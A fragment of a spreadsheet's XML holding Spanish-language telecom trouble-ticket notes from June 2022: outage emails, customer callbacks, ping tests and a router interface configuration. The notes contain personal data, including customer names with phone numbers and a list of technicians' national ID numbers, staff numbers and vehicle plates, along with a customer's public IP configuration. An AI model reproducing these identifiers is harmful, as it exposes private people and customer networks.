ELMER ALFONSO ORDOÑES                         1501.1996.00891
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4586098</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 20:30
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: ENLACE AFECTADO POR FALLA MASIVA PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_0591"
ESTIMADO CLIENTE:
LE SALUDO CORDIALMENTE, ASÍ MISMO INFORMAMOS QUE TENEMOS UNA ALARMA PROACTIVA  CON RESPECTO AL SIGUIENTE SERVICIO EL CUAL ESTÁ SIENDO AFECTADO POR FALLA EN UN EQUIPO DE ACCESO, LE BRINDAREMOS MÁS INFORMACIÓN AL RESPECTO EN BREVE.
TICKET: F4586098
ID: 8901167T
MASIVA: F4570721
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0591
UBICADO EN: LINEA C 10 LA MAQUINA CALLE PRINCIPAL SUCHITEPEQIEZ CUYOTEN
SALUDOS</t>
  </si>
  <si>
    <t>F4586104</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE NANCI CASTAÑEDA-42057199 INDICA QUE VERIFICARA AHORITA DEL POR QUE NO DEJARON INGRESAR A TECNICOS + QUE SE LE MARQUE EN 20 MINUTOS ## + SE LE ENVIA CORREO A CLIENTE DE AGENCIA EN DONDE SE TIENE AUTORIZACION DE PERMISOS POR PARTE DE CENTRAL-##
VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NANCI CASTAÑEDA-42057199 NO RESPONDE, SE INETNTARA LUEGO
-ID 3001714404</t>
  </si>
  <si>
    <t>##DEBIDO A LA HORA Y QUE CLIENTE SE RETIRA EN APROX 1 HORA 30 (LA CUAL.. NO DARIA TIEMPO NI DE LLEGAR NI DE REPARAR) ## Y NO HAY RESPUESTA POR PARTE DE CLIENTE, SE ENVIA NUEVAMENTE CORREO CON ARCHIVO PARA QUE PUEDAN GESTIONAR PERMISOS PARA EL DIA DE MAÑANA ##QUEDAMOS ATENTOS A RESPUESTA ##SEGUIMIENTO MAÑANA
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 17:27
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CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;
ASUNTO: RE: GDN 22591350||BANCO INDUSTRIAL.- 12 CALLE 0-93 ZONA 9 C.C. MONTUFAR
BUENA TARDE ESTIMADOS, FAVOR SU APOYO PARA TRAMITAR PERMISOS PARA EL DÍA DE MAÑANA JUEVES, E1 LO OBSERVAMOS DOWN.
NUEVAMENTE ADJUNTAMOS ARCHIVO EXCEL PARA QUE NOS APOYEN CON GESTIÓN DE PERMISOS HACIA AGENCIA.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>##SIN RESPUETA POR PARTE DEL CLIENTE ##</t>
  </si>
  <si>
    <t>SE HAS ENVIADO CORREO A CLIENTE- 3#EN ESPERA DE PERMISOS POR PARTE DE  BI
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 13:28
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CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;
ASUNTO: GDN 22591350||BANCO INDUSTRIAL.- 12 CALLE 0-93 ZONA 9 C.C. MONTUFAR
BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
GDN 22591350
BANCO INDUSTRIAL.-
12 CALLE 0-93 ZONA 9 C.C. MONTUFAR
SOLICITO SU APOYO PARA TRAMITAR PERMISOS CORRESPONDIENTES HACIA LOS TÉCNICOS DESCRITOS EN EL ARCHIVO .EXCEL.
QUEDAMOS AL PENDIENTE DE LOS PERMISOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA NANCI CASTAÑEDA-42057199
3001643939
COLA:
NOMBRE: A: 42057199
NÚMERO: 42057199
DURACIÓN: 0:02:02
ESTADO: CONECTADA
DETALLES: 42057199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/06/2022 13:08:10</t>
  </si>
  <si>
    <t>##SE LLLAMA A SUP RONALD. SE LE COMENTA QUE CLIENTE YA AUTORIZO LOS PERMISOS, QUEDA ENTERADO + ASIGNARA PERSONAL TECNICO ##SE APERTURARA WO A LAS 9AM DEBIDO A QUE CLIENTE INICIA LABOREAS HASTA ESA HORA#VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL GONZALEZ 55959062 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001814825 - 3001815332</t>
  </si>
  <si>
    <t>F4586106</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIN OLGUIN 98410363	ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 3001719311 -3001719489</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIN OLGUIN RODRIGUEZ 9841-0363 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001738241</t>
  </si>
  <si>
    <t>F4586112</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE LUIS BEDOLLA E INDICÓ QUE SI SE LE PUEDE LLAMAR EN 20 MINUTOS.</t>
  </si>
  <si>
    <t>F4586125</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SUGEYLI 60357696 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001695083</t>
  </si>
  <si>
    <t>F4586128</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS JEATZ AL 42148625 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001651431
**</t>
  </si>
  <si>
    <t>F4586130</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SOILA BLANCO AL 38850899  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001719679
**</t>
  </si>
  <si>
    <t>F4586131</t>
  </si>
  <si>
    <t>-* SE HABLA CON JORGE HERNANDEZ (CLIENTE) CONFIRMA TODO OK Y AUTORIZA CIERRE DE TICKET -*
+-*</t>
  </si>
  <si>
    <t>SE PROCEDE A VALIDAR CON CLIENTE
RE: 9607_ETE_DISTRIBUIDOR_PUERTO_BARRIOS_GUATEMALA|| ID ENLACE: 265900321</t>
  </si>
  <si>
    <t>F4586132</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR RAMOS.MARLON POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE PROCEDE A CERRAR EL CASO COMO BOLETA MAL ABIERTA
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 18:34
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; BCASTELLANOS@MAPFRE.COM.GT &lt;BCASTELLANOS@MAPFRE.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: 780300001T || QUETZAL ASISTENCIA | F4586132
BUENAS NOCHES SR. BRYAN CASTELLANOS
LE COMENTAMOS QUE EL DÍA DE HOY SE REALIZÓ LA SIGUIENTE CERTIFICACIÓN DEL SERVICIO DE 25MB.
TOMAR EN CUENTA QUE EL SERVICIO QUE SE CERTIFICO ES EL SIGUIENTE RAMBLA ZONA 14, BAJO EL SIGUIENTE ID  C-0060900301
EL CUAL SE ENCUENTRA CONFIGURADO EN NUESTRO PE DE UNICENTRO A 25MB SIMÉTRICOS.
IP PUBLICA: 190.143.136.58
DIRECCION 8 AVE. 3-90 ZONA 14, EDIF LA RAMBLA 5TO NIVEL OF. 5-2
CABE MENCIONAR QUE NO FUE AUTORIZADO DESCONECTAR LA RED LAN POR LO CUAL
LAS PRUEBAS SE REALIZARON CONECTADOS AL SWITCH (LAN DE CLIENTE)
LOS RESULTADOS DEL ANCHO DE BANDA SON SATISFACTORIOS.
UNICENTRO#SHOW RUNNING-CONFIG INTERFACE GI1/14.1985
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 256 BYTES
!
INTERFACE GIGABITETHERNET1/14.1985
 DESCRIPTION INFO 10 QUETZAL ASISTENCIA C-0060900301
 BANDWIDTH 25600
 ENCAPSULATION DOT1Q 1985
 IP ADDRESS 190.143.136.57 255.255.255.248
 SERVICE-POLICY INPUT SERVICIOS_25MB
 SERVICE-POLICY OUTPUT SERVICIOS_25MB
END</t>
  </si>
  <si>
    <t>-* SE ESTA SOLICITANDO APOYO NUEVAMENTE A PERSONAL DE CNOC VIA SKYPE -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRYAN CASTELLANOS AL 35121369 -  INDICA QUE YA RECIBIO CORREO QUEDA ENTERADO**
ID 1001084783
**</t>
  </si>
  <si>
    <t>CLIENTE SE ENCUENTRA EN LINEA ID 1001060781 POR SEGUIMIENTO DE OTRO TICKET Y HACE LA REFERENCIA DEL ACTUAL  DONDE COMENTA QUE NO VE LA VELOCIDAD DE LOS 10 MB Y POR TAL RAZÓN COMENTA  QUE LA SUBIDO Y BAJADA NO ES CORRECTA,  SE AL 8126 AL GESTOR JAIMEJ.HERNANDEZ ID 1001064689 ATIENDE LESTER RODAS Y S ELE BRINDA LA INFORMACIÓN Y COMENTA QUE SE LE INDIQUE AL CLIENTE QUE SE CONTACTARAN CON EL EN UNOS MOMENTOS PARA LA VISITA TÉCNICA PARA REALIZAR UNA CERTIFICACION. CLIENTE A LA ESPERA DE LA LLAMADA.</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO  CLIENTE SOLICITANDO ACCESOS
RE: 780300001T || QUETZAL ASISTENCIA |
JONATHAN EDUARDO TEZEN MEJIA
BUEN DIA  ESTIMADO CLIENTE  ,
 SOLICITANDO DE SU VALIOSO APOYO CON BRINDAR ACCESOS  A NUESTRA ÁREA TENIA,   PARA REALIZA VISITA TÉCNICA EL DÍA LUNES 06/06/2022  A PARTIR DE LAS 17:00 .PARA SERVICIO F4586132 |QUETZAL ASISTENCIA -MAPFRE | 780300001T | 8 AVE. 3-90 ZONA 14, EDIF LA RAMBLA 5TO NIVEL OF. 5-2
DATOS  TECNICOS
DPI	IBM	TECNICO 	VEHICULO
1582 46500 1801	652515	MARLON ENRIQUE MUÑOZ ORELLANA	P-0173JFM  NISSAN MARCH
1660 02313 1503	608559	JOSÉ ALBERTO IXPATA TOJ	P-0440HSR  NISSAN MARCH
2494 43260 0208	217826	JUAN JOSE RODRIGUEZ PAZ	P-740GTV  NISSAN MARCH
2149 40594 0103	532967	JAVIER DANILO CHETE CHAJON	P-0275HNJ FRONTIER
2530 48877 0101	589636	LUIS EMILIO GONZALEZ CATALAN	P-0273HNJ FRONTIER
1681 34810 0101	739764	PEDRO EDUARDO TOT MARTINEZ	 P-0055GLD  NISSAN SENTRA
2626 48784 0101	725586	MILTON ENRIQUE SALAZAR PÉREZ	P- 0439HSR NISSAN MARCH
1628 97243 1401	589058	EDGAR DANIEL GOMEZ MENDEZ	P-0905HNK NISSAN MARCH
2487 19076 0115	732334	JUAN ALBERTO TRUJILLO ORTIZ	P-0354HMP NISSAN MARCH
2414 54425 0101	659473	DANIEL ENRIQUE MONTENEGRO CARACUN	659473 2414 54425 0101
1981 48798 0101	52522	ERWIN EDUARDO DEL CID DUBON	P-0275HNJ FRONTIER
EN ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRYAN CASTELLANOS AL 58097654 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA ESTABLE QUE EL SOLICITO UN REPORTE DEL DIA  LUNES A  LAS 17:00 PM  LAS 19:00  HRS QUE EN ESE HORARIO FUE DONDE TUVO EL INCONVENIENTE E INDICA QUE LE HAN  ENVIADO UNOS PERO NO LOS DE ESE DIA Y ESA HORA || SE NOTIFICA A GESTOR **
-ID 3001958230
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN CASTELLANOS 35121369 MENCIONA QUE SIGUE PRESENTANDO PERDIDA DE PAQUETES CON LA IP  -- 190.143.136.58 -- CLIENTE MENCIONA QUE LAS PERDIDAS LAS PRESENTO EN EL HORARIO:
LUNES DE 16:40 - 18:10
HOY AL MEDIO DIA
-ID 3001669593</t>
  </si>
  <si>
    <t>F4586143</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN LA LLAMADA COMPLETA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAIDA BLANCO AL 38850899 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001656362
**</t>
  </si>
  <si>
    <t>F4586148</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA A AMBAS EXTENSIONES PERO NO ESTAN DISPONIBLES
3001668087
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 1/06/2022 14:26:42
3001668341
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 1/06/2022 14:27:19</t>
  </si>
  <si>
    <t>F4586157</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR JANGEL.GODINEZ POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE BYRON QUIEN INDICA QUE YA TODO SE ENCUENTRA ESTABLE Y SOLICITA EL CIERRE DEL TICKET.
INDICA QUE TENIA PROBLEMAS PARA LLAMAR A LOS NUMEROS DE CLARO CON TIGO NO TENIA INCONVENIENTES.
3001734023
COLA:
NOMBRE: A: 51637508
NÚMERO: 011 50251637508
DURACIÓN: 0:02:37
ESTADO: CONECTADA
DETALLES: +50251637508
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 17:17:52</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE BYRON PERO ENVIA A BUZON.
3001733436
COLA:
NOMBRE: A: 47690130
NÚMERO: 47690130
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 47690130
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 17:13:21</t>
  </si>
  <si>
    <t>F4586158</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
MIÉ 01/06/2022 1:53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363¿¿¿¿¿¿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6158¿¿
ID: 47500911T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0363
UBICADO EN:
1 CALLE Y 5 AVENIDA A ZONA 5, RETALHULEU, AGROMERCANTIL LA TRINIDAD RETALHULEU
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.</t>
  </si>
  <si>
    <t>F4586159</t>
  </si>
  <si>
    <t>SE PROCEDE A ENVIAR CORREO A CLIENTE PARA CONFIRMAR SI EXISTE POSIBLE CORTE DE ENERGÍA O MANTENIMIENTO. TICKET CAMBIA A ETAPA PENDIENTE CLIENTE.
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 14:22
PARA: IT-ALERTASCLARON1-GT@CAMPERO.COM &lt;IT-ALERTASCLARON1-GT@CAMPERO.COM&gt;; HELPDESK04@CAMPERO.COM &lt;HELPDESK04@CAMPERO.COM&gt;; HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; HELPDESK02@CAMPERO.COM &lt;HELPDESK02@CAMPERO.COM&gt;
CC: JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ENLACE ALARMADO CC_CAMPERO_GT_C659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
TICKET: F4586159
ID: 38300577T
IDENTIFICADOR DEL CLIENTE: CC_CAMPERO_GT_C659
UBICADO EN: 659, KM. 121.5 CARRETERA AL ATLÁNTICO CENTRO COMERCIAL PLAZA LAS CASCADAS LOCAL 135 TECULUTÁN, ZACAP
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4586179</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JASON AL 40100212 INDICA QUE AUN PERSISTE EL PROBLEMA QUE EL ANCHO DE BANDA QUE TIENE CONTRATADO ES DE 15 MBPS || SE NOTIFICA A GESTOR **
ID 3001696379
**</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR LUVY.SANDOVAL POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4586180</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 INDICA QUE ESTARA CONFIRMANDO EN LA AGENCIA Y QUE  EL RESPONDERA POR CORREO O QUE SE LE DE SEGUIMIENTO EN 30 MIN SI NO HA RESPONDIDO POR CORREO **
ID 3001849682
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE EL INCONVENIENTE ES INTERNO PORQUE AUN NO CUENTAN CON UN EQUIPO
-ID 3001876508</t>
  </si>
  <si>
    <t>SE LE EXPONE A CLIENTE QUE SE TIENE "DOS SERVICIOS" DE INTERNET EN MISMO SITIO, UNO XT Y EL SEGUNDO ID MIGRADO A CLARO, INDICA QUE POR SU PARTE ESTAN EN ESPERAN ENVIANDO A ALGUIEN PARA VERIFICAR SU EQUIPO INTERNO Y LO VALIDARAN POR LA MISMA COLA DE CORREOS DEL CASO CON WA-</t>
  </si>
  <si>
    <t>SE LLAMA AL PR LUDIN ALONZO AL 78827058 ID 3001703906 ATIENDE OTRO ECARGADO QUE NO SE INDENTIFICO  Y COMENTA QUE ESTA CON OTRAS PERSONAS DE CLARO EL GERENTE EN UNA LLAMADAS  Y QUE NO TIENEN INFORMACIÓN DE LA PERSONA LUDIN. POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR YENSI.CALGUA  POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 5290-4129 CONTESTA EL SEÑOR FEDERICO JUAREZ SE DEJA EN LINEA CON GESTOR **
ID 3001701212
**</t>
  </si>
  <si>
    <t>SE TIENE SALIDA HACIA INTERNET
&lt;CC_CAMPERO_GT_INTERNET_C687&gt;PING -A 190.148.100.33 1.1.1.1
  PING 1.1.1.1: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 1.1.1.1: BYTES=56 SEQUENCE=1 TTL=58 TIME=28 MS
    REPLY FROM 1.1.1.1: BYTES=56 SEQUENCE=2 TTL=58 TIME=29 MS
    REPLY FROM 1.1.1.1: BYTES=56 SEQUENCE=3 TTL=58 TIME=29 MS
    REPLY FROM 1.1.1.1: BYTES=56 SEQUENCE=4 TTL=58 TIME=29 MS
    REPLY FROM 1.1.1.1: BYTES=56 SEQUENCE=5 TTL=58 TIME=29 MS
  --- 1.1.1.1 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 28/28/29 MS
&lt;CC_CAMPERO_GT_INTERNET_C687&gt;</t>
  </si>
  <si>
    <t>F4586182</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ALEX SANCHEZ 30930217
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LOGRA COMUNICACION CON CLIENTE ALEX PARA REALIZAR PRUEBAS, CLIENTE INDICA QUE LA PBX NO SE ENCUENTRA FISICAMENTE EN LAS INSTALACIONES, COMENTA QUE EL SERVICIO VA CONECTADA A UN CBC QUE VA CONECTADO HACIA NICARAGUA, INDICA QUE ESTARA INDICANDO AL PERSONAL A CARGO QUE LA REVISEN Y QUE SE LE DEVUELVA LA LLAMADA EN 30 MIN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ALEX SANCHEZ, QUIEN INDICA QUE HIZO UN CAMBIO EN LOS EQUIPOS PERO QUE VA HABLAR CON EL PROVEEDOR.
SOLICITA QUE SE CIERRE EL TICKET Y SI EL PROVEEDOR NO SOLVENTA ENTONCES VA ABRIR UNO NUEVO.
3001688143
COLA:
NOMBRE: A: 30930217
NÚMERO: 011 50230930217
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: +50230930217
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/06/2022 15:24:45</t>
  </si>
  <si>
    <t>CLIENTE NO CONTESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4586184</t>
  </si>
  <si>
    <t>F4586195</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 RESPONDE NOE MENCIONA QUE PRESENTARON PERDIDA DE PAQUETES A LAS 12:30 DEL MEDIO DIA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001683988</t>
  </si>
  <si>
    <t>F4586201</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 OPERADORA INDICA QUE TODOS LOS AGENTES ESTAN OCUPADOS || SE INTENTARA LUEGO **
ID 3001800849
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR GERALD TORRES INDICA QUE JUSTO ESTA VIENDO UNA CAIDA || SE NOTIFICA A GESTOR **
ID 3001703625
**</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR MIGUELAN.RODRIGUEZ POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE LLAMO AL CAM 22437253  NO CONTESTARON IVR ENVIA A BUZON, ID: 3001706300.</t>
  </si>
  <si>
    <t>F4586202</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SIN PERDIDAS NI TIEMPOS ALTOS .
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 10.1.229.202
  PING 10.1.229.202: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.1.229.202 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.32.25
DISPLAY IP ROUTING-TABLE 10.1.229.202
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : _PUBLIC_
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.1.229.200/29  DIRECT  0    0             D   10.1.229.205    VBDIF422			</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE STEEB FLORES 0050497661563 QUIEN CONFIRMA LA VISITA PARA LAS 18:30 REALIZAR LA CERTIFICACION
-ID 3001972085</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2669-1300 EXT: 1380 NO RESPONDE | SE INTENTARA LUEGO **
ID 3001811196
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 51745299 CONTESTA EL SEÑOR EMILIO AGUILAR INDICA QUE NO LE APARECE TICKET ABIERTO QUE LE APARECEN CERRADOS || SE NOTIFICA A GESTOR **
ID 3001888737
**</t>
  </si>
  <si>
    <t>F4586204</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ORLINDA ROBLEDO/PR 30607135 INDICA QUE HABÍA MAL CLIMA EN SECTOR (MUCHA BRISA EN SECTOR ASEGURÓ), PERO ENLACE OK DESDE LAS 14:50 HORAS.
SE LLAMÓ/HABLÓ CON BRYAN POCASANGRE/CLIENTE 25041690 CONFIRMA LO DICHO POR PR, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4586210</t>
  </si>
  <si>
    <t>**SE LLAMA AC LIENTE JORGE HERNANDEZ - 58652751 NO RESPONDE ENVIA A BUZON || SE INTENTARA
LUEGO **
ID 3001705797
**</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO A LO DICHO EN CRONO ANTERIOR, SE ESCALA CON JUAN CARDONA/TEAM LEADER, INDICA QUE NOS APOYARÁ.</t>
  </si>
  <si>
    <t>FALLA F4586539 YA CERRADA; SE PIDE APOYO A PERSONAL DE FALLAS MASIVAS VÍA SKYPE VERIFICAR SERVICIO.</t>
  </si>
  <si>
    <t>**SE LLAMA AC LIENTE JORGE HERNANDEZ - 58652751  INDICA QUE AUN VE FUERA EL ENLACE || SE NOTIFICA A GESTOR **
ID 3001711811
**</t>
  </si>
  <si>
    <t>F4586220</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, SE LE NOTIFICA QUE TECNICO SE ENCUENTRA EN LAS INSTALACIONES PERO PERSONAL DE TAVSA NO ESTA PRESENTE,
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 4 DE JUNIO DE 2022 10:27
